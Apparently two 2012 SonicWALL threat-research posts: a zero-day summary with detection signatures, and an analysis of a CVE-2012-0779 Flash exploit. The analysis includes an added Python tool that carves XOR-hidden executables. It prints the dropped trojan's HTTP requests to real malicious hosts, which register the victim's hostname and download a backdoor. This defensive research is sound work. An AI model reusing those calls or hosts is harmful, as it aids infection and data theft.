
Well-known Zero-day Vulnerabilities 2012 Summary (Aug 9, 2012)

A zero-day attack or threat is an attack that exploits a previously unknown vulnerability in a computer application, operating system, etc. Multiple zero-day vulnerabilities are found each year. The following are the well-known zero-day vulnerabilities for the first half of 2012. Dell SonicWALL coverage for these vulnerabilities and references are also listed:

With the deployed signatures, Dell SonicWALL has prevented its customers from being attacked. The following are the statistics for the last 20 days:

2012 Zero-day hits

To better protect our customers, Dell SonicWALL has partnered with Microsoft on the MAPP program, and here is the MAPP landing page: https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=380.

On the above page, you can find all the vulnerabilities Microsoft has released over the past two years and our coverage for them. Dell SonicWALL has cooperated successfully with Microsoft on detecting and preventing these vulnerabilities; for example, for the latest 0-day vulnerability, CVE-2012-1889, we deployed signatures on the same day Microsoft released its public advisory: MAPP Partners with Updated Protections

In addition to the signatures detecting 0-day vulnerabilities, we have more than 200 shellcode detection IPS signatures, which proactively detect and block many attacks in the wild. The following are some examples of these IPS signatures:

  • 4569 HTTP Server Shellcode Exploit 8
  • 4573 Server Application Shellcode Exploit 10
  • 4574 HTTP Server Shellcode Exploit 10
  • 4584 Server Application Shellcode Exploit 17
  • 4598 Server Application Shellcode Exploit 3
  • 4601 HTTP Server Shellcode Exploit 11

New Adobe Flash Player exploit (May 4, 2012)

SonicWALL Threats Research team observed a new Flash exploit in the wild targeting the recently patched Adobe Flash Player vulnerability – CVE-2012-0779.

The exploit arrives as an e-mail attachment and if the user opens the document it will attempt to exploit the newly patched Adobe Flash Player vulnerability. Upon successful run, it will drop and run additional malware on the victim machine.

The specially crafted document will invoke Microsoft Internet Explorer in the background to download a malicious SWF exploit file from a remote compromised server located in Korea:

The HTTP request to the remote server contains information about the compromised host name and the offset at which the malicious executable is embedded inside the document. The response contains a compressed SWF exploit file which has an ActionScript payload encrypted via DoSWF.

A quick look at the SWF exploit file metadata shows the User account & Author website information used to encrypt this file:

The embedded executable file inside the document is XOR'ed with the single-byte key 0x85 and is a Downloader Trojan:

The Downloader Trojan was dropped and executed upon successful exploit run. It registers the infection on a remote site and downloads a Backdoor Trojan.

     GET /register/log.asp?isnew=-1&LocalInfo=(Operating System Information)&szHostName=(HOSTNAME)&tmp3=tmp3
     Host: dextsolution.com

     GET /Include/lib/ps.exe   [ Detected as PcClient.NGO_3 (Trojan) ]
     Host: www.multicodec.co.kr
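One way an analyst can recover an executable obfuscated the way the embedded downloader above is (a single-byte XOR, key 0x85) is to scan the document for a DOS/PE header under each candidate key and validate it through e_lfanew. This added Python example is not SonicWALL's code; it generalizes to all 256 keys, and the sample "document", the offset 0x200 and the minimal fake PE header are constructed assumptions (only the key 0x85 comes from the post).

```python
import struct

REPORTED_KEY = 0x85  # single-byte XOR key reported for this sample's embedded downloader


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def find_xored_pe(blob: bytes, keys=range(256)):
    """Locate PE images hidden in blob under a single-byte XOR key.

    For each key, search for the encoded 'MZ' DOS stub, decode e_lfanew
    (DWORD at +0x3C) and confirm it points at an encoded 'PE\\0\\0' signature.
    Returns a list of (offset, key) tuples; key 0 catches unobfuscated PEs.
    """
    hits = []
    for key in keys:
        needle = xor_bytes(b"MZ", key)
        pos = blob.find(needle)
        while pos != -1 and pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", xor_bytes(blob[pos + 0x3C:pos + 0x40], key))[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew <= 0x400 and xor_bytes(blob[pe:pe + 4], key) == b"PE\x00\x00":
                hits.append((pos, key))
            pos = blob.find(needle, pos + 1)
    return hits


def carve_pe(blob: bytes, offset: int, key: int) -> bytes:
    """Decode the embedded executable from offset to the end of the blob."""
    return xor_bytes(blob[offset:], key)


def build_sample_document() -> bytes:
    """Constructed test input (not real malware): OLE-like filler with a
    minimal fake PE header XORed with REPORTED_KEY at assumed offset 0x200."""
    header = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x80)  # e_lfanew = 0x80
    header += b"\x00" * (0x80 - len(header)) + b"PE\x00\x00" + b"\x00" * 16
    filler = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"A" * (0x200 - 8)
    return filler + xor_bytes(header, REPORTED_KEY) + b"A" * 64


if __name__ == "__main__":
    doc = build_sample_document()
    for off, key in find_xored_pe(doc):
        print(f"PE header at 0x{off:x}, XOR key 0x{key:02x}")
        print(carve_pe(doc, off, key)[:2])  # b'MZ'
```

On a real sample, pass the document bytes to find_xored_pe and write the carve_pe output to disk for further analysis; a second hit with key 0 would indicate an unobfuscated PE is also present.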

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CVE-2012-0779.dc (Exploit)
  • GAV: CVE-2012-0779#swf (Exploit)
  • GAV: Mdrop.DOI (Trojan)
  • GAV: PcClient.NGO_3 (Trojan)

SonicWALL Intrusion Prevention System provides protection against this threat via the following signatures:

  • 7772 – Adobe Flash Player Object Confusion Exploit 1
  • 7773 – Adobe Flash Player Object Confusion Exploit 2